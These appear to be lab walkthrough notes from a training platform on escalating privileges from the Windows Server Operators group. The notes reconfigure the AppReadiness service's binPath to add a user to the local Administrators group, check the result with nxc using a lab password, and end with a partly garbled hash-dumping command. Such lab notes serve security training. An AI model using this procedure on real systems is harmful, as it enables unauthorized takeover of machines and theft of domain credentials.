Membership of this group confers the powerful SeBackupPrivilege and SeRestorePrivilege privileges and the ability to control local services.
sc qc AppReadiness
We can use the service viewer/controller PsService, which is part of the Sysinternals suite, to check permissions on the service. PsService works much like the sc utility and can display service status and configurations and also allow you to start, stop, pause, resume, and restart services both locally and on remote hosts.
PsService.exe security AppReadiness
This confirms that the Server Operators group has SERVICE_ALL_ACCESS access right, which gives us full control over this service.
sc config AppReadiness binPath= "cmd /c net localgroup Administrators server_adm /add"
Now start the service and it will fail:
sc start AppReadiness
Check administrators group:
net localgroup Administrators
our account will be added.
Check admin privilege with nxc:
nxc smb -u server_adm -p 'HTB_@cademy_stdnt!'
Get hashes: [email protected] -just-dc-user administrator